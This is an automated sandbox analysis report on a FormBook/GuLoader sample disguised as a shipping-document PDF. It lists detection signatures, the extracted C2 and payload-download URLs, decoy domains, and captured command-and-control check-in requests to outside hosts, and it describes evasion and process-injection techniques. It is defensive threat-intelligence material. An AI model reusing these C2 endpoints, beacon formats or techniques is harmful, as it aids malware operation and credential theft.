Windows Analysis Report Arrival Notice, CIA Awb Inv Form.pdf.exe

Overview

General Information

Sample Name: Arrival Notice, CIA Awb Inv Form.pdf.exe
Analysis ID: 527894
MD5: ff71941571d8930c1125b3931d400d86
SHA1: 0a417bf568a5978777021e433bf4693893facd3e
SHA256: bf952f1cd44de7bf63c63e502670d3a6a97eca1b5f7fd9981ed0d235351e975f

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]}
Source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}
Multi AV Scanner detection for submitted file
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Virustotal: Detection: 37%
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

Compliance:

Uses 32bit PE files
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49806 version: TLS 1.2
Source: Binary string: netstat.pdbGCTL source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source: Binary string: netstat.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop esi 8_2_0281731A

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 154.94.229.8 80
Source: C:\Windows\explorer.exe Network Connect: 107.178.157.225 80
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe Network Connect: 35.198.112.85 80
Source: C:\Windows\explorer.exe Network Connect: 70.40.220.123 80
Source: C:\Windows\explorer.exe Network Connect: 183.181.99.12 80
Source: C:\Windows\explorer.exe Network Connect: 184.168.98.97 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 64.190.62.111 80
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=16igyruBe
Source: Malware configuration extractor URLs: www.papllc.biz/s3f1/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.izivente.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.musee-radix-hairsalon.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.teslafreesuperchargermiles.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.mvsteals.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.thaicharuen.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.morningstarapparel.space Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.soarlikeaneagle.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.evaccines.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.celsb.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1 Host: www.4mtechmachines.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1 Host: www.hara.cloud Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 64.190.62.111 64.190.62.111
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-14-5s-docs.googleusercontent.com Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 24 Nov 2021 14:09:53 GMT Content-Type: text/html Content-Length: 275 ETag: "6197bde3-113" Via: 1.1 google Connection: close Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 24 Nov 2021 14:10:33 GMT Content-Type: text/html Content-Length: 275 ETag: "618be74a-113" Via: 1.1 google Connection: close Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 24 Nov 2021 14:12:17 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 24 Nov 2021 14:14:34 GMT Content-Type: text/html Content-Length: 275 ETag: "61951b77-113" Via: 1.1 google Connection: close Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 00000007.00000000.22755704421.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22655480693.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22985193767.000000000D59B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: http://s.symcd.com06
Source: explorer.exe, 00000007.00000000.22975794820.000000000A7C0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22635050466.0000000002FB0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22646529192.0000000009AB0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.micro
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=a
Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000000.22750707443.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22980392582.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22651288186.000000000D05E000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-14-5s-docs.googleusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.izivente.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.musee-radix-hairsalon.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.teslafreesuperchargermiles.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.mvsteals.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.thaicharuen.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.morningstarapparel.space Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.soarlikeaneagle.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.evaccines.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 Host: www.celsb.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1 Host: www.4mtechmachines.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1 Host: www.hara.cloud Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49806 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
